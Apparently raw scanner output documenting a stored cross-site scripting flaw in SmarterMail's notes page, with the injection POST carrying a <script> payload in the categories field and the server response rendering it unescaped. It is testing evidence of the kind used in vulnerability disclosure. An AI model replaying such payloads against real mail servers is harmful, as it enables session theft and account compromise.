__EVENTTARGET=ctl00%24BrPH%24OKImageButton&__EVENTARGUMENT=1&__VIEWSTATE=%2fwEPDwUKLTE1MzIwNjc1OQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfA2VkZGTYbBeYmpPfD5OfkuIOw4oB9USDxQ%3d%3d&ctl00%24MPH%24txtCategories_SettingText=%3cscript%3ens(0x005CD1)%3c%2fscript%3e

Identification Request

POST /Main/frmNote.aspx?nsextt=//example.com/netsparker0x005D36.css HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 5097
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJNTMwODkzMTIzDxYGHghfX19UaXRsZQUITXkgTm90ZXMeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCAw9kFgQCAQ9kFgICAw8PFgIeB1Zpc2libGVoZGQCAw9kFgICAQ8PFgIfA2hkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8DaGQCBg8WAh8DaGQCBw9kFgJmD2QWAgIBDxYCHwNoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAg9kFgQCAQ9kFgJmD2QWAgIBD2QWAmYPEGQQFQUFV2hpdGUGWWVsbG93BFBpbmsFR3JlZW4EQmx1ZRUFBXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMFZ2dnZ2dkZAIDD2QWAmYPZBYCZg8PFgQeCENzc0NsYXNzBQ5JbmRlbnQgU2V0dGluZx4EXyFTQgICZGQCBA9kFgQCAw8PFgIfBQUBMGRkAgUPDxYCHwVlZGQYAgUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjIPMtwLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAtAQ2F0ZWdvcmllcwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAADUNhdGVnb3JpZXNUYWILZAUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjEPMtYLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAhARGV0YWlscwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAACk9wdGlvbnNUYWILZBSUsAO7eeFzFCBJ7x6oDsIVkS94&ctl00%24TPH%24TabStrip%24SelectedTab=ctl00_TPH_TabStrip_Tab2&ctl00%24MPH%24VisiblePage=ctl00_MPH_CategoriesTab&ctl00%24MPH%24lstColors_SettingDropDown=white&ctl00%24MPH%24txtNote_SettingText=&

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:12:07 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2563
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:14:36 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5250
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNote.aspx?nsextt=%2f%2fexample.com%2fnetsparker0x005D36.css" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTMwODkzMTIzDxYGHghfX19UaXRsZQUITXkgTm90ZXMeEF9fX1Jlc3VsdEZhaWx1cmUFLUNvcnJlY3QgdGhlIGhpZ2hsaWdodGVkIGZpZWxkcyBiZWZvcmUgc2F2aW5nLh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgMPZBYEAgEPZBYCAgMPDxYCHgdWaXNpYmxlaGRkAgMPZBYCAgEPDxYCHwNoZGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfA2hkAgYPFgIfA2hkAgcPZBYCZg9kFgICAQ8WAh8DZxYCAgEPFgIeBFRleHQFqgE8ZGl2IGNsYXNzPSJUaXBUZXh0RmFpbHVyZSI+PGltZyBzcmM9Ii9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL0ljb25zL1RpcFRleHQvRmFpbHVyZS5naWYiIGFsdD0iIi8gYWxpZ249ImFic21pZGRsZSI+IENvcnJlY3QgdGhlIGhpZ2hsaWdodGVkIGZpZWxkcyBiZWZvcmUgc2F2aW5nLjwvZGl2PmQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWBAICD2QWBAIBD2QWAmYPZBYCAgEPZBYCZg8QZBAVBQVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQUFd2hpdGUGeWVsbG93BHBpbmsFZ3JlZW4EYmx1ZRQrAwVnZ2dnZ2RkAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkZAIED2QWBAIDDw8WAh8FBQExZGQCBQ8PFgIfBQUdPHNjcmlwdD5ucygweDAwNUNEMSk8L3NjcmlwdD5kZBgDBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUhY3RsMDAkTVBIJGNoa0NhdGVnb3J5XzU4MDc5NjAyOF8wBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMg8y3AsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BDYXRlZ29yaWVzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAANQ2F0ZWdvcmllc1RhYgtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMQ8y1gsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAACEBEZXRhaWxzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkILjGXwBTM5nH19P6+ajH0a7c+BI=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1'], ['ctl00$BPH$btnSave'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

<div id="ctl00_BPH_btnManageCategories" class="BBButton"><a class="ButtonBarAnchor" href="javascript%3aOpenMasterCategoriesPopup%28%29" onclick="window.location.href = 'javascript\x3aOpenMasterCategoriesPopup\x28\x29'; return false;" tabindex='0'><span class="BBInner">Master Categories</span></a></div>

</div>
<div class="ButtonBarRight">



</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">
<div id="ctl00_TipTextDiv" class="TipTextContainer">
<div class="TipTextFailure"><img src="/App_Themes/Default/Images/Icons/TipText/Failure.gif" alt=""/ align="absmiddle"> Correct the highlighted fields before saving.</div>
</div>
</span>
<div id="ctl00_trTabStrip" class="TabStripContainer">


<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
<li class='htsItem htsFirst' id='ctl00_TPH_TabStrip_Tab1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Details</span></span></a></li>
<li class='htsItem htsLast htsSelected' id='ctl00_TPH_TabStrip_Tab2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Categories</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_Tab2" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


</div>
<div id="Scrollable" class="ContentDiv">

<div id="ctl00_MPH_UP1">


<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
<input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_CategoriesTab" />
<div id='ctl00_MPH_OptionsTab' class='' style='display:none'>
<span id="ctl00_MPH_OptionsTab">
<table class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_lstColors">
<td id="ctl00_MPH_lstColors_Label" class="Indent Fixed">Color</td><td id="ctl00_MPH_lstColors_Setting" class="Setting"><select name="ctl00$MPH$lstColors_SettingDropDown" id="ctl00_MPH_lstColors_SettingDropDown">
<option selected="selected" value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select></td>
</tr>
</table>
<table id="ctl00_MPH_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_txtNote">
<td id="ctl00_MPH_txtNote_Setting" class="Indent Setting" colspan="2"><span class='Label'>Note<br /></span><textarea name="ctl00$MPH$txtNote_SettingText" rows="12" cols="50" id="ctl00_MPH_txtNote_SettingText" class="text"></textarea></td>
</tr>
</table>
</span></div>

<div id='ctl00_MPH_CategoriesTab' class='' >
<span id="ctl00_MPH_CategoriesTab">
<table id="ctl00_MPH_tblCategories" class="SettingsContainer SCMarginTop" border="0">
<tr>
<td class="Setting Indent"><input id="ctl00_MPH_chkCategory_580796028_0" type="checkbox" name="ctl00$MPH$chkCategory_580796028_0" /><label for="ctl00_MPH_chkCategory_580796028_0"><script>ns(0x005CD1)</script></label></td>
</tr>
</table>


<a id="ctl00_MPH_lnkRefresh" href="javascript:__doPostBack('ctl00$MPH$lnkRefresh','')"></a>
</span></div>

</div>


</div>

</div>


<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">

</div>
<div class="FooterSummary">

</div>
</div>

<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmnote', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>



<script type="text/javascript">
function OpenMasterCategoriesPopup() { SpawnHyperWindow("/Main/frmPopupContactCategories.aspx", 450, 270, RefreshWindow); }
function RefreshWindow() { __doPostBack("ctl00$MPH$lnkRefresh", ""); }
</script>




<script type="text/javascript">
//<![CDATA[
var valSwitchTab = function() { $('#ctl00_TPH_TabStrip').selectHyperTabByIndex(0); };
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
